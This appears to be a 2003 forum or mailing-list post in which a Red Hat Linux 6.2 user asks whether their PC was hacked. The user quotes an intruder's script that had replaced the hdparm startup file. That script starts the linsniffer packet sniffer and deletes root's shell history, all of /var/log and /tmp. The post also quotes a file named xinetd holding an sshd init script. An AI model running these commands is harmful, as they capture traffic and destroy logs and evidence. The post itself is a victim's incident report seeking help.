 | | | My pc hacked? | My pc hacked? 2003-04-19 - By A. Johnson Jeba Asir
Back
Hello all,
My RedHat Linux 6.2 pc hdparm file was replaced with the following
contents :-
#!/bin/sh
cd /usr/share/.pht
/usr/sbin/xinetd stop
./panel -f ./s
./linsniffer >> ./tcp.log &
cd /
rm -rf /root/.bash_history
rm -rf /var/log/*
rm -rf /tmp/*
cd /
All the above listed commands seems to have been executed.
Also a new file named xinetd is available. The details are appended below.
I had Ipchains rules allowing restricted access.
Now Is my PC hacked? If so please give details on how it may have been
done? How do I prevent this from happening again?
Please reply
Thanking you,
Johnson. A
xinetd file content
-- ---- ---- ------
#!/bin/bash
# Init file for OpenSSH server daemon
#
# chkconfig: 2345 55 25
# description: OpenSSH server daemon
#
# processname: sshd
# config: /etc/ssh/ssh_host_key
# config: /etc/ssh/ssh_host_key.pub
# config: /etc/ssh/ssh_random_seed
# config: /etc/ssh/sshd_config
# pidfile: /var/run/sshd.pid
# source function library
. /etc/rc.d/init.d/functions
RETVAL=0
function start()
{
if [ ! -f /etc/ssh/ssh_host_key -o ! -s /etc/ssh/ssh_host_key ]; then
/usr/bin/ssh-keygen -b 1024 -f /etc/ssh/ssh_host_key -N ''
fi
if [ ! -f /etc/ssh/ssh_host_dsa_key -o ! -s /etc/ssh/ssh_host_dsa_key ]; then
/usr/bin/ssh-keygen -d -f /etc/ssh/ssh_host_dsa_key -N ''
fi
echo -n "Starting sshd:"
daemon /usr/sbin/sshd
RETVAL=$?
echo
[ "$RETVAL" = 0 ] && touch /var/lock/subsys/sshd
}
function stop()
{
echo -n "Stopping sshd:"
killproc /usr/sbin/sshd
RETVAL=$?
echo
[ "$RETVAL" = 0 ] && rm -f /var/lock/subsys/sshd
}
case "$1" in
start)
start
;;
stop)
stop
;;
restart)
stop
start
;;
condrestart)
if [ -f /var/lock/subsys/sshd ] ; then
stop
start
fi
;;
status)
status /usr/sbin/sshd
;;
*)
echo "Usage: sshd {start|stop|restart|condrestart|status}"
RETVAL=1
esac
exit $RETVAL
-- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ------
Earn $52 per hosting referral at Lunarpages.
|
|
|